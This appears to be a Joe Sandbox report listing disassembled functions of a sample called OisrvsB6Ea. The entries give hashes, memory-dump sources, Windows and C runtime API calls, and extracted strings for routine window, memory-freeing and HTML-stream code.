                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                  • Instruction ID: 1c6570d1c671afdfbb07300aed5dcc071aa19ba45719885997945fb888e9dcaf
                                                                                  • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                  • Instruction Fuzzy Hash: 9B524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                  Function 00287153 Relevance: .5, Instructions: 536COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c47a84f4b51f8a4e295de90c4893e806d94971659b8bebc99e641f597e402741
                                                                                  • Instruction ID: 294d988db2e18f13b7d200c12bcda0e4c87e02d65c48e47100276db6da562cfc
                                                                                  • Opcode Fuzzy Hash: c47a84f4b51f8a4e295de90c4893e806d94971659b8bebc99e641f597e402741
                                                                                  • Instruction Fuzzy Hash: B512E3B46297068FC718DF28C494A79B7E0FF94304F24892EE996C7781E374E9A4CB45
                                                                                  Function 0027C426 Relevance: .5, Instructions: 454COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae9b9e209f950152f3de3597df2e0f451122a96334de16632cfe69195bf76c07
                                                                                  • Instruction ID: 67c5cc490432118bd67efb04798340e490533777253d25d4a3f217c0594df162
                                                                                  • Opcode Fuzzy Hash: ae9b9e209f950152f3de3597df2e0f451122a96334de16632cfe69195bf76c07
                                                                                  • Instruction Fuzzy Hash: 4DF19B716283029FC758CF38C48462ABBE9EFCA314F258A2EF5C997355D630E955CB42
                                                                                  Function 0027E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c5ac217c0816188cd7544555c8f37ebb52ddb615c119df8d5fee557086db3fa
                                                                                  • Instruction ID: bef793a37ec32dfe625de5777adc70f156edf6c2ac02474dd2e46caa17a02cc0
                                                                                  • Opcode Fuzzy Hash: 7c5ac217c0816188cd7544555c8f37ebb52ddb615c119df8d5fee557086db3fa
                                                                                  • Instruction Fuzzy Hash: B4E17C755083949FC344CF29E88486ABFF1AF9E300F454A5EF9C497352C235EA19DBA2
                                                                                  Function 00284088 Relevance: .3, Instructions: 270COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                  • Instruction ID: 02326ba2274add37b0a78e09312780bf6b673c2914be9f90b60c140a68be61e3
                                                                                  • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                  • Instruction Fuzzy Hash: 949199B42253478BDB24FF64D895BBE73C4EB90304F10092DF98AC72C2DA749565CB52
                                                                                  Function 002843BF Relevance: .2, Instructions: 243COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                  • Instruction ID: 670c08a1338796c2ee1b8ea2648b3cbea3a0140866b885e250c7afc319d76bf8
                                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                  • Instruction Fuzzy Hash: D1818CB57253434FDB24FE68C8C1BBD77D4EBA0304F40492DE98A8B2C2DA7499A5C752
                                                                                  Function 002951C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f64def1522901235e8cd223907441362354ec33e12412bca47a6e6e04af8c5b
                                                                                  • Instruction ID: bf1ca50fc8f72498dbefde41e6236f1124fb500686ab2b023e5fb3d64f97e09e
                                                                                  • Opcode Fuzzy Hash: 9f64def1522901235e8cd223907441362354ec33e12412bca47a6e6e04af8c5b
                                                                                  • Instruction Fuzzy Hash: 85618731F30F3A56DE3A9F68A8A17BE2394EB02740F140619EC42DF281D291DD728B09
                                                                                  Function 00294F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                  • Instruction ID: 2cb9ab6d4409efdafa05d8d806311be826b8e41975cf56e50b4aca87545cb9e4
                                                                                  • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                  • Instruction Fuzzy Hash: E7516820330F6757DF375E28846AFBF23C59F05304F180919E88ACB682C645ED368791
                                                                                  Function 0027EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2a0f481607df9e16a6e7035513051298fc5279db0746338a7db9a4f231563ec
                                                                                  • Instruction ID: 779443f7f8fad0216783cd0aa880c61d91cdfc5eea823bd7db1a4f12a388b31e
                                                                                  • Opcode Fuzzy Hash: e2a0f481607df9e16a6e7035513051298fc5279db0746338a7db9a4f231563ec
                                                                                  • Instruction Fuzzy Hash: 8F51B33151D3D58FDB11CF28C64046EBFE0AEAA314F4A49A9E4DD5B243C231DA5ACB62
                                                                                  Function 002800B7 Relevance: .1, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 49763a2ddeeae727a6d9285661c59647bc1a0094e07ec38bc8ba91c6c310806a
                                                                                  • Instruction ID: 771d9f55e0e827e9dac91144a3bd4bd695018f8dac9545612408026ca251a27c
                                                                                  • Opcode Fuzzy Hash: 49763a2ddeeae727a6d9285661c59647bc1a0094e07ec38bc8ba91c6c310806a
                                                                                  • Instruction Fuzzy Hash: B751D0B1A087159FC788CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB96
                                                                                  Function 00283E0B Relevance: .1, Instructions: 112COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                  • Instruction ID: c95368126bcc7ad0eb4b6e95cb946c3e1023d18b16f359e016275d0740ff1a81
                                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                  • Instruction Fuzzy Hash: 9631E4B5A247468FCB14EF28C85116EBBE0FB95714F14852DE489C7741C734EA1ACB92
                                                                                  Function 0027E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 0027E30E
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                    • Part of subcall function 00281DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,002B1030,?,0027D928,00000000,?,00000050,002B1030), ref: 00281DC4
                                                                                  • _strlen.LIBCMT ref: 0027E32F
                                                                                  • SetDlgItemTextW.USER32(?,002AE274,?), ref: 0027E38F
                                                                                  • GetWindowRect.USER32(?,?), ref: 0027E3C9
                                                                                  • GetClientRect.USER32(?,?), ref: 0027E3D5
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0027E475
                                                                                  • GetWindowRect.USER32(?,?), ref: 0027E4A2
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0027E4DB
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0027E4E3
                                                                                  • GetWindow.USER32(?,00000005), ref: 0027E4EE
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0027E51B
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0027E58D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                  • String ID: $%s:$CAPTION$d$t*
                                                                                  • API String ID: 2407758923-364107577
                                                                                  • Opcode ID: 1f785ab0cd411cd7a626648112fa5b2a3557a5f85f9e0d983da07d64ccece2f9
                                                                                  • Instruction ID: 0bddbb5da5fd8347050b5d2c7775be1bfb4232dff8e5b647fccc5c5e8149e4c7
                                                                                  • Opcode Fuzzy Hash: 1f785ab0cd411cd7a626648112fa5b2a3557a5f85f9e0d983da07d64ccece2f9
                                                                                  • Instruction Fuzzy Hash: FB81C372504302AFD710DF68DC89B6FBBE9EF89704F05491DF988D7250D630E9158B62
                                                                                  Function 0029CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0029CB66
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C71E
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C730
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C742
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C754
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C766
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C778
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C78A
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C79C
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7AE
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7C0
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7D2
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7E4
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7F6
                                                                                  • _free.LIBCMT ref: 0029CB5B
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 0029CB7D
                                                                                  • _free.LIBCMT ref: 0029CB92
                                                                                  • _free.LIBCMT ref: 0029CB9D
                                                                                  • _free.LIBCMT ref: 0029CBBF
                                                                                  • _free.LIBCMT ref: 0029CBD2
                                                                                  • _free.LIBCMT ref: 0029CBE0
                                                                                  • _free.LIBCMT ref: 0029CBEB
                                                                                  • _free.LIBCMT ref: 0029CC23
                                                                                  • _free.LIBCMT ref: 0029CC2A
                                                                                  • _free.LIBCMT ref: 0029CC47
                                                                                  • _free.LIBCMT ref: 0029CC5F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID: h*
                                                                                  • API String ID: 161543041-2779658993
                                                                                  • Opcode ID: 6ab5d293248e26bb81c1d76a1f67c4067f16f121df0bd7c32616a563f4b5056a
                                                                                  • Instruction ID: 045597b035cf9f05c0cc9fcf1115fc02869d8445c52b277ace3fb3a509807d24
                                                                                  • Opcode Fuzzy Hash: 6ab5d293248e26bb81c1d76a1f67c4067f16f121df0bd7c32616a563f4b5056a
                                                                                  • Instruction Fuzzy Hash: 6E314D316243069FEF21AE78D946B5AB7E9EF11314F24542AE658D7192DF31EC60CF20
                                                                                  Function 002996F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00299705
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 00299711
                                                                                  • _free.LIBCMT ref: 0029971C
                                                                                  • _free.LIBCMT ref: 00299727
                                                                                  • _free.LIBCMT ref: 00299732
                                                                                  • _free.LIBCMT ref: 0029973D
                                                                                  • _free.LIBCMT ref: 00299748
                                                                                  • _free.LIBCMT ref: 00299753
                                                                                  • _free.LIBCMT ref: 0029975E
                                                                                  • _free.LIBCMT ref: 0029976C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID: 0d*
                                                                                  • API String ID: 776569668-16800759
                                                                                  • Opcode ID: 8ad9ea54cd4d4995838383b114f172d9e3eac6e1128e779ff3a7bda3d93f0cde
                                                                                  • Instruction ID: 8e36869d3f7789994c9701b5bc0f3dfb90d26426882e6d3fd0f8fd4ae905c89d
                                                                                  • Opcode Fuzzy Hash: 8ad9ea54cd4d4995838383b114f172d9e3eac6e1128e779ff3a7bda3d93f0cde
                                                                                  • Instruction Fuzzy Hash: 3011A476120109AFCF01EFA4C842DD93BB5EF15350B5554A5FB088F262DE32DA609F94
                                                                                  Function 00289711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00289736
                                                                                  • _wcslen.LIBCMT ref: 002897D6
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 002897E5
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00289806
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0028982D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                  • String ID: Fjun($</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                  • API String ID: 1777411235-2077056101
